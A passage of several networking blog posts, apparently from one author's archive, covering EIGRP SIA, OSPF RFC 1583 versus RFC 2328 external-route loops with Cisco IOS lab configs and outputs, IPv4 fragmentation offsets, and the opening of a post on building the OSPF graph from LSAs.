So why did we filter only unicast packets instead of dropping all EIGRP datagrams? Well, it would have required me to initiate the events at the same time, right after the last Hello from R3 was received. Although that is possible with some automation, using the Active timer instead removed the delay between my brain and the keyboard completely from the equation while still providing us with the same result.
However, that’s not what we observed during the test. I’ll have to speculate a little bit here as I don’t have a strict explanation for it, only a suggestion.
It’s possible to alleviate the problem by increasing the gap between default values of Active and Holddown timers. However, feasibility of such a method really depends on the total delay between the routers so I’d consider it to be a workaround. It seems that IOS 12.0 implements exactly this behaviour; version 11 could have provided different results but I could not find the image.
The proper solution to the problem at hand is SIA. The idea is simple: separate prefix availability check (Query) from neighbour availability check (SIA-Query). Such an approach incurs no tangible dependency on total delay compared to timer tuning. Besides, it is generally a good idea to separate functions and not to overload them extensively.
Does it really matter in the modern world, especially since SIA cannot be disabled? Most likely not, to be honest, unless you run a very outdated IOS version (SIA would be the least of your concerns in such a case though). Understanding the reason for a feature to be implemented makes me feel good – so maybe such a knowledge would make someone feel good as well.
Lately I’ve covered one of the reasons for RFC 2328 to emerge. However, that’s not the only scenario when OSPF calculations, compliant with RFC 1583, can lead to routing loops. If you’ve peeked at RFC 2178, then you probably know what’s coming next.
Besides fixing the metric for aggregate routes, RFC 2328 also changed the best path selection process for external routes.
Otherwise, compare the cost of this new AS external path to the ones present in the table. Type 1 external paths are always shorter than type 2 external paths. Type 1 external paths are compared by looking at the sum of the distance to the forwarding address and the advertised type 1 metric (X+Y). Type 2 external paths are compared by looking at the advertised type 2 metrics, and then if necessary, the distance to the forwarding addresses.
Compare the AS external path described by the LSA with the existing paths in N’s routing table entry, as follows. If the new path is preferred, it replaces the present paths in N’s routing table entry. If the new path is of equal preference, it is added to N’s routing table entry’s list of paths.
(a) Intra-area and inter-area paths are always preferred over AS external paths.
(b) Type 1 external paths are always preferred over type 2 external paths. When all paths are type 2 external paths, the paths with the smallest advertised type 2 metric are always preferred.
(c) If the new AS external path is still indistinguishable from the current paths in the N’s routing table entry, and RFC1583Compatibility is set to “disabled”, select the preferred paths based on the intra-AS paths to the ASBR/forwarding addresses, as specified in Section 16.4.1.
(d) If the new AS external path is still indistinguishable from the current paths in the N’s routing table entry, select the preferred path based on a least cost comparison. Type 1 external paths are compared by looking at the sum of the distance to the forwarding address and the advertised type 1 metric (X+Y). Type 2 external paths advertising equal type 2 metrics are compared by looking at the distance to the forwarding addresses.
RFC 1583 compares the same route from different ASBRs solely based on metric.
RFC 2328 prefers intra-area ASBRs over the rest; if there is a tie, only then it compares the costs to ASBRs.
So the selection decisions of interest are:
intra-area ASBR preference;
no distinction between intra-area backbone and inter-area ASBRs.
Consider the following setup:
The ASBRs peer with BGP node to exchange a few prefixes: receive 1.1.1.1/32 and announce 3.3.3.3/32. ASBRs also announce a default route into OSPF domain. Two links have non-default costs, they are marked in red. Apart from that, no special configuration is present, everything is left by default.
ASBR1#sho run | s interface|router
interface Loopback0
ip address 2.2.2.2 255.255.255.255
ip ospf 1 area 0
interface FastEthernet0/0
ip address 192.168.23.2 255.255.255.0
ip ospf 1 area 0
ip ospf cost 10
interface FastEthernet0/1
ip address 192.168.12.2 255.255.255.0
router ospf 1
default-information originate always
router bgp 100
no bgp default ipv4-unicast
neighbor 192.168.12.1 remote-as 1
!
address-family ipv4
network 3.3.3.3 mask 255.255.255.255
neighbor 192.168.12.1 activate
ASBR2#sho run | section interface|router
interface Loopback0
ip address 6.6.6.6 255.255.255.255
ip ospf 1 area 1
interface FastEthernet0/0
ip address 192.168.16.6 255.255.255.0
interface FastEthernet0/1
ip address 192.168.56.6 255.255.255.0
ip ospf 1 area 1
interface FastEthernet1/0
ip address 192.168.46.6 255.255.255.0
ip ospf 1 area 1
ip ospf cost 100
router ospf 1
default-information originate always
router bgp 100
no bgp default ipv4-unicast
neighbor 192.168.16.1 remote-as 1
!
address-family ipv4
network 3.3.3.3 mask 255.255.255.255
neighbor 192.168.16.1 activate
ABR1#sho run | section interface|router
interface Loopback0
ip address 4.4.4.4 255.255.255.255
ip ospf 1 area 0
interface FastEthernet0/0
ip address 192.168.45.4 255.255.255.0
ip ospf 1 area 0
interface FastEthernet0/1
ip address 192.168.34.4 255.255.255.0
ip ospf 1 area 0
interface FastEthernet1/0
ip address 192.168.46.4 255.255.255.0
ip ospf 1 area 1
ip ospf cost 100
router ospf 1
ABR2#sho run | section interface|router
interface Loopback0
ip address 5.5.5.5 255.255.255.255
ip ospf 1 area 0
interface FastEthernet0/0
ip address 192.168.45.5 255.255.255.0
ip ospf 1 area 0
interface FastEthernet0/1
ip address 192.168.56.5 255.255.255.0
ip ospf 1 area 1
router ospf 1
R#sho run | section interface|router
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
ip address 192.168.23.3 255.255.255.0
ip ospf cost 10
interface FastEthernet0/1
ip address 192.168.34.3 255.255.255.0
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
Obviously, the configuration is pretty innocent, BGP should be able to reach out to 3.3.3.3/32 by using 1.1.1.1 as a source address.
BGP#ping 3.3.3.3 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
.....
Success rate is 0 percent (0/5)
However, that’s not the case. Maybe some routes are missing along the way?
BGP#traceroute 3.3.3.3 source 1.1.1.1
Type escape sequence to abort.
Tracing the route to 3.3.3.3
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.16.6 12 msec 24 msec 20 msec
2 192.168.56.5 56 msec 16 msec 36 msec
3 * * *
<output omitted>
It seems that ABR1 is dropping the packets. However, that’s not really the case if one runs a traceroute from R:
R#traceroute 1.1.1.1 source 3.3.3.3
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.34.4 16 msec 16 msec 20 msec
2 192.168.34.3 20 msec 24 msec 16 msec
3 192.168.34.4 32 msec 36 msec 40 msec
4 192.168.34.3 36 msec 40 msec 36 msec
<you get the idea>
According to the topology, R selects a proper default route towards ASBR2:
R#sho ip ospf border-routers
OSPF Router with ID (3.3.3.3) (Process ID 1)
Base Topology (MTID 0)
Internal Router Routing Table
Codes: i - Intra-area route, I - Inter-area route
i 4.4.4.4 [1] via 192.168.34.4, FastEthernet0/1, ABR, Area 0, SPF 12
i 5.5.5.5 [2] via 192.168.34.4, FastEthernet0/1, ABR, Area 0, SPF 12
i 2.2.2.2 [10] via 192.168.23.2, FastEthernet0/0, ASBR, Area 0, SPF 12
I 6.6.6.6 [3] via 192.168.34.4, FastEthernet0/1, ASBR, Area 0, SPF 12
I 6.6.6.6 [101] via 192.168.34.4, FastEthernet0/1, ASBR, Area 0, SPF 12
ABR1, though, goes haywire:
ABR1#sho ip ospf border-routers
OSPF Router with ID (4.4.4.4) (Process ID 1)
Base Topology (MTID 0)
Internal Router Routing Table
Codes: i - Intra-area route, I - Inter-area route
i 5.5.5.5 [101] via 192.168.46.6, FastEthernet1/0, ABR, Area 1, SPF 8
i 5.5.5.5 [1] via 192.168.45.5, FastEthernet0/0, ABR, Area 0, SPF 9
i 2.2.2.2 [11] via 192.168.34.3, FastEthernet0/1, ASBR, Area 0, SPF 9
i 6.6.6.6 [100] via 192.168.46.6, FastEthernet1/0, ASBR, Area 1, SPF 8
Take a very close look at the cost towards ASBR2 from both points of view. R selects the path via ABR2 with the cost of 3; however, ABR1 knows nothing about the path through ABR2 and sees only the cost of 100. The reason for such behaviour is relatively simple: ASBR2 and ABR1 are in the same area, so ABR1 prefers the intra-area route. As a consequence, the ASBR preference changes yet again for a transit packet, which results in a routing loop.
Let’s switch over to RFC 2328 on all the routers in the domain:
R#traceroute 1.1.1.1 so 3.3.3.3
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.34.4 20 msec 32 msec 12 msec
2 192.168.46.6 12 msec 20 msec 8 msec
3 192.168.16.1 4 msec 28 msec 16 msec
ABR1#sho ip ro os
<output omitted>
Gateway of last resort is 192.168.46.6 to network 0.0.0.0
O*E2 0.0.0.0/0 [110/1] via 192.168.46.6, 00:02:00, FastEthernet0/1
<output omitted>
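The difference between the two rule sets can be sketched as a small decision function fed with the costs from the border-router tables above. This is a simplified model under stated assumptions: both ASBRs advertise the default route with the same type 2 metric, each router is given one best path per ASBR, and `AsbrPath` and `preferred_asbr` are hypothetical names rather than anything from an OSPF implementation.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AsbrPath:
    asbr: str
    path_type: str  # "intra" or "inter"
    area: int       # area the path belongs to
    cost: int


def preferred_asbr(paths, rfc1583_compatibility):
    """Pick the ASBR for an external route with equal type 2 metrics."""
    if rfc1583_compatibility:
        # RFC 1583 style: only the cost to the ASBR matters.
        candidates = paths
    else:
        # RFC 2328 style: intra-area paths through non-backbone areas win;
        # backbone intra-area and inter-area paths are of equal preference.
        non_backbone_intra = [p for p in paths if p.path_type == "intra" and p.area != 0]
        candidates = non_backbone_intra or paths
    return min(candidates, key=lambda p: p.cost).asbr


r_view = [AsbrPath("ASBR1", "intra", 0, 10), AsbrPath("ASBR2", "inter", 0, 3)]
abr1_view = [AsbrPath("ASBR1", "intra", 0, 11), AsbrPath("ASBR2", "intra", 1, 100)]

# RFC 1583: R forwards towards ASBR2 via ABR1, ABR1 forwards towards ASBR1 via R.
print(preferred_asbr(r_view, True), preferred_asbr(abr1_view, True))    # ASBR2 ASBR1
# RFC 2328: both routers agree on ASBR2, so the loop disappears.
print(preferred_asbr(r_view, False), preferred_asbr(abr1_view, False))  # ASBR2 ASBR2
```

In the first case the two neighbours disagree on the exit point and bounce the packet between each other, which is what the looping traceroute from R shows.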
Although the loop is defeated at last, we still face suboptimal routing. R still considers routes towards ASBR1 (backbone intra-area) and ASBR2 (inter-area) to be equal so it proceeds to comparing the costs. Wouldn’t it be better to just prefer backbone route over inter-area? This was exactly the idea in RFC 2178:
Intra-area paths using non-backbone areas are always the most preferred.
Otherwise, intra-area backbone paths are preferred.
However, there was a strong reason to move away to the current selection process:
There is still the possibility of a routing loop in RFC 2178 when both
virtual links are in use and
the same external route is being imported by multiple ASBRs, each of which is in a separate area.
To fix this problem, Section 16.4.1 has been revised. To choose the correct ASBR/forwarding address, intra-area paths through non-backbone areas are always preferred. However, intra-area paths through the backbone area (Area 0) and inter-area paths are now of equal preference, and must be compared solely based on cost.
The reasoning behind this change is as follows. When virtual links are in use, an intra-area backbone path for one router can turn into an inter-area path in a router several hops closer to the destination. Hence, intra-area backbone paths and inter-area paths must be of equal preference. We can safely compare their costs, preferring the path with the smallest cost, due to the calculations in Section 16.3.
As far as I know, there is no support specifically for RFC 2178 among relevant OSPF implementations. Luckily, vivid imagination helps in such cases. Consider the following topology:
RFC 2178 compliance:
R1 compares the inter-area ASBR1 with the intra-area backbone ASBR2 (via virtual-link).
Backbone ASBR2 is better so R1 sends a packet to it.
R2 compares inter-area ASBR1 and ASBR2.
ASBR1 is better, so R2 sends packet to it – back to R1.
RFC 2328 compliance:
R1 compares the inter-area ASBR1 with the intra-area backbone ASBR2 and considers them equal.
R1 compares costs towards ASBR1 (2) and ASBR2 (13).
ASBR1 is better so R1 sends a packet to it via ABR2.
The source of evil for external routes in OSPF – change of ASBR preference along the path. RFC 2328 eliminates such changes at last, although at the cost of optimal routing. However, RFC authors reckon that inefficient path is usually better than a completely broken one.
OSPF is a rather rigid IGP with a lot of inner complexities. Although it’s possible to tune this protocol to some extent, one should have a very deep understanding of repercussions to avoid sophisticated troubleshooting. In the end, KISS is very much applicable to OSPF. If you require a more flexible protocol, the choice is obvious: either you need BGP or a better network architect.
There are quite a few versions of OSPF out there in the wild. However, it might be uncommon knowledge that several RFCs exist just for OSPFv2, although most implementations conform either to RFC 1583 or RFC 2328. The aforementioned RFCs are not compatible, so there is even an article that vividly describes the mayhem different versions could cause in a network. So why did the IETF bother to create a second subversion of the protocol? The reason is simple: RFC 1583 contains inherent flaws in the algorithm that could cause loops in the network.
One of the significant differences between the two versions is how ABRs calculate the metric for aggregated routes.
When the range’s status indicates Advertise, a Type 3 advertisement is generated with Link State ID equal to the range’s address (if necessary, the Link State ID can also have one or more of the range’s “host” bits set; see Appendix F for details) and cost equal to the smallest cost of any of the component networks.
When the range’s status indicates Advertise, a Type 3 summary-LSA is generated with Link State ID equal to the range’s address (if necessary, the Link State ID can also have one or more of the range’s “host” bits set; see Appendix E for details) and cost equal to the largest cost of any of the component networks.
For a very long time this change seemed to me like a forklift upgrade made for some vague greater good. However, RFC 2178 has a pretty good section on the true reasons for such a drastic change:
There are two manifestations of this problem. The first, discovered by Dennis Ferguson, occurs when an aggregated forwarding address is in use. In this case, the desirability of the forwarding address can change for the worse as a packet crosses an area aggregation boundary on the way to the forwarding address, which in turn can cause the preference of AS-external-LSAs to change, resulting in a routing loop.
Feels cryptic? Welcome to the club. Let’s build up a scenario that illustrates the problem.
Areas 1 and 2 include the external-facing interfaces in OSPF in order to populate the Forwarding Address field. The ABRs summarize these ranges into area 0. Let’s recap the path selection process for external routes in RFC 1583:
intra-AS paths are better than external paths;
Type-1 (E1) paths are better than Type-2 (E2) paths;
lower metric wins;
E2 only: lower metric towards Forwarding Address wins.
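The recap can be expressed as a sort key. This is a simplified sketch rather than the full RFC 1583 procedure: the ExternalPath class and its field names are hypothetical, only external candidates are compared (so the first rule is left out), and E1 paths are assumed to add the external metric to the internal cost, as OSPF normally does. The sample values are the forward metrics R1 reports in this lab.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ExternalPath:
    asbr: str            # label of the advertising ASBR (illustrative)
    metric_type: int     # 1 for E1, 2 for E2
    metric: int          # metric carried in the LSA5
    forward_metric: int  # internal cost towards the Forwarding Address


def preference_key(path):
    """Smaller tuple means a more preferred path."""
    if path.metric_type == 1:
        # E1: external and internal costs are summed
        return (1, path.metric + path.forward_metric, 0)
    # E2: external metric first, internal cost is only a tie-breaker
    return (2, path.metric, path.forward_metric)


def best_path(paths):
    return min(paths, key=preference_key)


candidates = [
    ExternalPath("ASBR1", metric_type=2, metric=1, forward_metric=12),
    ExternalPath("ASBR2", metric_type=2, metric=1, forward_metric=1002),
]
print(best_path(candidates).asbr)
```

With equal E2 metrics the decision rests entirely on the forward metric, which is exactly the value an ABR can distort when it aggregates a range.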
Here’s the config for all routers in this setup:
R1#show run | section interface|router
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
interface FastEthernet0/1
ip address 192.168.13.1 255.255.255.0
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
ABR1#sho run | section interface|router
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
ip address 192.168.24.2 255.255.255.0
ip ospf 1 area 1
router ospf 1
area 1 range 10.1.0.0 255.255.0.0
network 0.0.0.0 255.255.255.255 area 0
ABR2#sho run | section interface|router
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
ip address 192.168.35.3 255.255.255.0
ip ospf 1 area 2
interface FastEthernet0/1
ip address 192.168.13.3 255.255.255.0
router ospf 1
area 2 range 10.2.0.0 255.255.0.0
network 0.0.0.0 255.255.255.255 area 0
ASBR1#sho run | section interface|router
interface Loopback0
ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
ip address 10.1.46.4 255.255.255.0
ip ospf cost 1000
interface FastEthernet0/1
ip address 192.168.24.4 255.255.255.0
router ospf 1
router-id 4.4.4.4
redistribute bgp 1 subnets
network 0.0.0.0 255.255.255.255 area 1
router bgp 1
bgp router-id 4.4.4.4
no bgp default ipv4-unicast
neighbor 10.1.46.6 remote-as 6
!
address-family ipv4
redistribute ospf 1
neighbor 10.1.46.6 activate
ASBR2#sho run | section interface|router
interface Loopback0
ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
ip address 192.168.35.5 255.255.255.0
interface FastEthernet0/1
ip address 10.2.56.5 255.255.255.0
ip ospf cost 10
router ospf 1
router-id 5.5.5.5
redistribute bgp 1 subnets
network 0.0.0.0 255.255.255.255 area 2
router bgp 1
bgp router-id 5.5.5.5
no bgp default ipv4-unicast
neighbor 10.2.56.6 remote-as 6
!
address-family ipv4
redistribute ospf 1
neighbor 10.2.56.6 activate
BGP#sho run | s interface|router
interface Loopback0
ip address 6.6.6.6 255.255.255.255
interface FastEthernet0/0
ip address 10.1.46.6 255.255.255.0
interface FastEthernet0/1
ip address 10.2.56.6 255.255.255.0
router bgp 6
no bgp default ipv4-unicast
neighbor 10.1.46.4 remote-as 1
neighbor 10.2.56.5 remote-as 1
!
address-family ipv4
network 6.6.6.6 mask 255.255.255.255
neighbor 10.1.46.4 activate
neighbor 10.2.56.5 activate
Let’s verify that R1 has connectivity to R6:
R1#sho ip route 6.6.6.6
Routing entry for 6.6.6.6/32
Known via "ospf 1", distance 110, metric 1
Tag 6, type extern 2, forward metric 12
Last update from 192.168.12.2 on FastEthernet0/0, 00:04:10 ago
Routing Descriptor Blocks:
* 192.168.12.2, from 4.4.4.4, 00:04:13 ago, via FastEthernet0/0
Route metric is 1, traffic share count is 1
Route tag 6
R1#ping 6.6.6.6 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 12/35/56 ms
Since both routes are E2 with the same metric, R1 selects the best one based on the cost towards the Forwarding Address:
R1#sho ip ospf database external | include Link State ID|Network Mask|Forward Address|LS Type
LS Type: AS External Link
Link State ID: 6.6.6.6 (External Network Number )
Network Mask: /32
Forward Address: 10.1.46.6
LS Type: AS External Link
Link State ID: 6.6.6.6 (External Network Number )
Network Mask: /32
Forward Address: 10.2.56.6
R1#
R1#show ip route 10.2.56.6
Routing entry for 10.2.0.0/16
Known via "ospf 1", distance 110, metric 1002, type inter area
Last update from 192.168.13.3 on FastEthernet0/1, 00:01:10 ago
Routing Descriptor Blocks:
* 192.168.13.3, from 3.3.3.3, 00:01:10 ago, via FastEthernet0/1
Route metric is 1002, traffic share count is 1
R1#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
Known via "ospf 1", distance 110, metric 12, type inter area
Last update from 192.168.12.2 on FastEthernet0/0, 00:10:25 ago
Routing Descriptor Blocks:
* 192.168.12.2, from 2.2.2.2, 00:10:25 ago, via FastEthernet0/0
Route metric is 12, traffic share count is 1
There is only one tiny addition pending: let’s configure a loopback on ASBR2 with an address from 10.2.0.0/16 range:
ASBR2#sho run interface loopback 1
interface Loopback1
ip address 10.2.2.2 255.255.255.255
An update worthy of an EOBD on Friday:
R1#ping 6.6.6.6 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
.....
Success rate is 0 percent (0/5)
BANG! Network connectivity is lost. Guess what’s happening?..
R1#traceroute 6.6.6.6 source loopback 0
Type escape sequence to abort.
Tracing the route to 6.6.6.6
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.13.3 28 msec 16 msec 20 msec
2 192.168.13.1 24 msec 20 msec 20 msec
3 192.168.13.3 36 msec 40 msec 40 msec
4 192.168.13.1 40 msec 40 msec 40 msec
<you get the point>
Let’s peek at R1’s point of view on the network:
R1#show ip route 6.6.6.6
Routing entry for 6.6.6.6/32
Known via "ospf 1", distance 110, metric 1
Tag 6, type extern 2, forward metric 3
Last update from 192.168.13.3 on FastEthernet0/1, 00:04:17 ago
Routing Descriptor Blocks:
* 192.168.13.3, from 5.5.5.5, 00:04:17 ago, via FastEthernet0/1
Route metric is 1, traffic share count is 1
Route tag 6
R1#
R1#show ip ospf database external | include Link State ID|Network Mask|Metric|Forward
Link State ID: 6.6.6.6 (External Network Number )
Network Mask: /32
Metric Type: 2 (Larger than any link state path)
Metric: 1
Forward Address: 10.1.46.6
Link State ID: 6.6.6.6 (External Network Number )
Network Mask: /32
Metric Type: 2 (Larger than any link state path)
Metric: 1
Forward Address: 10.2.56.6
R1#
R1#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
Known via "ospf 1", distance 110, metric 12, type inter area
Last update from 192.168.12.2 on FastEthernet0/0, 00:22:00 ago
Routing Descriptor Blocks:
* 192.168.12.2, from 2.2.2.2, 00:22:00 ago, via FastEthernet0/0
Route metric is 12, traffic share count is 1
R1#
R1#show ip route 10.2.56.6
Routing entry for 10.2.0.0/16
Known via "ospf 1", distance 110, metric 3, type inter area
Last update from 192.168.13.3 on FastEthernet0/1, 00:05:51 ago
Routing Descriptor Blocks:
* 192.168.13.3, from 3.3.3.3, 00:05:51 ago, via FastEthernet0/1
Route metric is 3, traffic share count is 1
Clearly it has changed its mind regarding the best path towards 6.6.6.6/32, flipping from ASBR1 to ASBR2. You probably already know what’s on ABR2’s mind?
ABR2#show ip route 6.6.6.6
Routing entry for 6.6.6.6/32
Known via "ospf 1", distance 110, metric 1
Tag 6, type extern 2, forward metric 13
Last update from 192.168.13.1 on FastEthernet0/1, 00:17:24 ago
Routing Descriptor Blocks:
* 192.168.13.1, from 4.4.4.4, 00:17:24 ago, via FastEthernet0/1
Route metric is 1, traffic share count is 1
Route tag 6
ABR2#
ABR2#show ip os database external | include Link State ID|Netowrk Mask|Metric|Forward
Link State ID: 6.6.6.6 (External Network Number )
Metric Type: 2 (Larger than any link state path)
Metric: 1
Forward Address: 10.1.46.6
Link State ID: 6.6.6.6 (External Network Number )
Metric Type: 2 (Larger than any link state path)
Metric: 1
Forward Address: 10.2.56.6
ABR2#
ABR2#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
Known via "ospf 1", distance 110, metric 13, type inter area
Last update from 192.168.13.1 on FastEthernet0/1, 00:27:01 ago
Routing Descriptor Blocks:
* 192.168.13.1, from 2.2.2.2, 00:27:01 ago, via FastEthernet0/1
Route metric is 13, traffic share count is 1
ABR2#
ABR2#show ip route 10.2.56.6
Routing entry for 10.2.56.0/24
Known via "ospf 1", distance 110, metric 1001, type intra area
Last update from 192.168.35.5 on FastEthernet0/0, 00:18:04 ago
Routing Descriptor Blocks:
* 192.168.35.5, from 5.5.5.5, 00:18:04 ago, via FastEthernet0/0
Route metric is 1001, traffic share count is 1
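ABR2 compares the costs towards both Forwarding Addresses (13 via R1 versus 1001 inside area 2) and decides to forward traffic to ASBR1 via R1, hence the loop. Now let’s turn on RFC 2328 compliance on ABR2 (on IOS this is done with no compatible rfc1583 under the OSPF process). ABR2 would then advertise the worst metric among the aggregated subnets, so the path towards the Forwarding Address can only get better as a packet crosses the area boundary, not the other way around.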
And – poof! – R1 can select an appropriate path once again:
R1#ping 6.6.6.6 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 12/28/40 ms
R1#
R1#show ip route 6.6.6.6
Routing entry for 6.6.6.6/32
Known via "ospf 1", distance 110, metric 1
Tag 6, type extern 2, forward metric 12
Last update from 192.168.12.2 on FastEthernet0/0, 00:01:10 ago
Routing Descriptor Blocks:
* 192.168.12.2, from 4.4.4.4, 00:01:10 ago, via FastEthernet0/0
Route metric is 1, traffic share count is 1
Route tag 6
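The flip-flop can be reproduced with a bit of arithmetic. The sketch below is only a model: the function names are made up, and ABR2's component costs (1001 for 10.2.56.0/24 and 2 for the new loopback) are inferred from the outputs above, not read from ABR2 directly.

```python
def range_cost(component_costs, rfc1583_compat):
    """Cost an ABR advertises for an aggregated range."""
    costs = list(component_costs)
    return min(costs) if rfc1583_compat else max(costs)


# ABR2's intra-area costs towards the components of 10.2.0.0/16 (inferred)
AREA2_COMPONENTS = {"10.2.56.0/24": 1001, "10.2.2.2/32": 2}
R1_TO_ABR2 = 1          # cost of the R1-ABR2 link
R1_TO_FA_VIA_ABR1 = 12  # R1's cost towards 10.1.46.6 via ABR1


def r1_choice(rfc1583_compat):
    """Return (R1's cost towards 10.2.0.0/16, ASBR that R1 prefers)."""
    via_abr2 = R1_TO_ABR2 + range_cost(AREA2_COMPONENTS.values(), rfc1583_compat)
    winner = "ASBR2" if via_abr2 < R1_TO_FA_VIA_ABR1 else "ASBR1"
    return via_abr2, winner


for compat in (True, False):
    cost, winner = r1_choice(compat)
    print(f"RFC 1583 compatibility {compat}: cost {cost}, R1 prefers {winner}")
```

With the smallest component cost R1 sees 3 and is lured towards ASBR2, while ABR2 itself knows the real cost is 1001. With the largest component cost R1 sees 1002 and stays on ASBR1.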
The creepy part is that RFC 1583 compliant devices have been widely deployed since the inception of the standard, including Cisco IOS, Juniper JunOS and Huawei VRP. Obviously, this is done for the sake of backwards compatibility, because other products implement RFC 2328 by default (e.g. Arista EOS, Cisco NX-OS). Still, the ease of creating a loop with an innocent configuration is something to watch out for. The solution is rather simple though: either enable RFC 2328 or deploy OSPF in a KISS way: no virtual links, NSSA, FA or other CCIE-beloved stuff.
Good old IPv4… It is as ubiquitous in the networking world as air is on Earth. Although folks around the world use it on a daily basis, IPv4 still has a few surprises up its sleeve. Today we’re going to peek at one of them.
Here is the topology of four routers lined up in a row:
R2#show run | section router|interface FastEthernet
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
ip address 192.168.23.2 255.255.255.0
router eigrp 1
network 0.0.0.0
By default, the IP MTU on each link is equal to 1500 bytes. This means that the acceptable IP packet size, including headers and payload, can be up to 1500 bytes; if a packet is too big, it has to be fragmented. Suppose the MTU of the R2-R3 link is lowered to 1400 bytes on both ends:
R2#show run interface fastEthernet0/1
interface FastEthernet0/1
ip address 192.168.23.2 255.255.255.0
ip mtu 1400
How many fragments would a 1500-byte packet produce?
R1#ping 4.4.4.4 source 1.1.1.1 size 1500 repeat 1
Type escape sequence to abort.
Sending 1, 1500-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 68/68/68 ms
It’s pretty easy to deduce that a 1500-byte packet should result in 2 fragments for an MTU of 1400 bytes. However, why are there 2 fragments for the ICMP echo reply as well? Well, it turns out that ICMP is in fact supposed to work this way:
The data received in the echo message must be returned in the echo reply message.
RFC792
Let’s reduce the R2-R3 MTU down to 700 bytes on both ends and check whether we can squeeze exactly two fragments of 700 bytes through it. The IP header is 20 bytes long, so the initial packet should be 680*2 + 20 = 1380 bytes in size (IP MTU includes the header, remember?).
R1#ping 4.4.4.4 source 1.1.1.1 size 1380 repeat 1
Type escape sequence to abort.
Sending 1, 1380-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 48/48/48 ms
Now for the highlight of the testing: the magical MTU value of 725.
R1#ping 4.4.4.4 source 1.1.1.1 size 1430 repeat 1
Type escape sequence to abort.
Sending 1, 1430-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 48/48/48 ms
Let’s break down the initial packet: a 20-byte header and 1410 bytes of payload that result… in 3 fragments? Shouldn’t 1410 bytes fit perfectly into two fragments carrying 705 bytes of payload each?
Frankly speaking, 725 is as special as any other MTU whose payload room (MTU minus the 20-byte header) is not divisible by 8. The catch is the Fragment Offset field, which specifies the position of a fragment’s payload relative to the start of the original data.
Fragment offset is measured in units of 8 bytes. Since 705 is not divisible by 8, the router rounds it down to the nearest multiple of 8, which is 704 bytes.
The exact fragment sizing is not mandated by the RFC. In this particular case R2 puts 704 bytes into the first fragment, only 8 bytes into the second one and the remaining 698 bytes into the last one.
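The arithmetic for all three tests can be checked with a short sketch. It assumes a 20-byte header without IP options and a greedy split that fills every fragment but the last as much as possible. The function name is made up, and a real router is free to distribute the bytes differently, as R2 does, so only the fragment count is expected to match.

```python
IP_HEADER = 20  # bytes, assuming no IP options


def fragment_payloads(packet_size, mtu, header=IP_HEADER):
    """Return payload sizes of the fragments produced by a greedy split."""
    payload = packet_size - header
    # Every fragment except the last must carry a multiple of 8 bytes,
    # because Fragment Offset is counted in 8-byte units.
    max_chunk = (mtu - header) // 8 * 8
    if max_chunk <= 0:
        raise ValueError("MTU is too small to carry any payload")
    chunks = []
    while payload > max_chunk:
        chunks.append(max_chunk)
        payload -= max_chunk
    chunks.append(payload)
    return chunks


for size, mtu in [(1500, 1400), (1380, 700), (1430, 725)]:
    parts = fragment_payloads(size, mtu)
    print(f"packet {size}, MTU {mtu}: {len(parts)} fragments, payloads {parts}")
```

For MTU 725 the greedy split yields payloads of 704, 704 and 2 bytes; R2's 704/8/698 split is different but equally valid, since both keep every non-final fragment on an 8-byte boundary.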
In the end, hosts try to avoid fragmentation altogether by various means: PMTUD and TCP MSS, to name a few. Such behaviour makes issues with unpredictable fragment sizes even less likely to occur in real life. However, sometimes one needs a reason to justify learning IP headers, er?..
It’s not a secret that OSPF is a link-state routing protocol: it collects topology information, builds a graph and runs the Dijkstra algorithm to determine the shortest path. Topology information is the data one would collect anyway to find the best path with a pen and a piece of paper: it includes nodes, their interfaces and subnets, besides certain operational facts (e.g., flags). OSPF organizes this data into structures called LSAs (link-state advertisements). The SPF algorithm is also well known to the IT community; it can be found in almost any academic curriculum nowadays.
LSA roles are well described in various articles and notes: router LSA for nodes, network LSA for broadcast segment, summary LSA for inter-area information transfer… However, I find it relatively difficult to assemble all these pieces into a holistic puzzle called graph. I admit that RFC must hold the ultimate truth and thus the extensive description of the process, but this knowledge has evaded me for quite some time. This is the reason for this article: I’d like to share my understanding of LSA roles and how to build the graph out of LSDB.
The basis for this discussion is the following topology:
